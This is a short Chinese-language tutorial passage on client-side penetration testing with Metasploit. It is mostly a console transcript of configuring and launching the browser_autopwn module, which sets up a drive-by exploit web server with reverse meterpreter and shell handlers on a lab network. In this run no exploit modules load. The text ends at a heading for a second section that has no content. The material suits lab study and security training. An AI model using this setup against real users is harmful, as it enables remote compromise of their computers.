前言
使用metasploit对客户端渗透测试
一、browser autopwn攻击
msf6 > use auxiliary/server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
msf6 auxiliary(server/browser_autopwn) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
msf6 auxiliary(server/browser_autopwn) > set srvport 80
srvport => 80
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 auxiliary(server/browser_autopwn) > set uripath /
uripath => /
msf6 auxiliary(server/browser_autopwn) > exploit
[*] Running module against 192.168.1.115
[*] Auxiliary module execution completed
[*] Setup
msf6 auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host 192.168.1.113...
.....
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.1.113:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.1.113:6666
[*] Started reverse TCP handler on 192.168.1.113:7777
[*] --- Done, found 0 exploit modules
[-] No exploits, check your MATCH and EXCLUDE settings
[*] Cleaning up exploits...
启动模块后,任何一个连接到系统80端口的目标都会遭到渗透攻击
二、对网站的客户端进行渗透
metasploit对网站客户进行渗透测试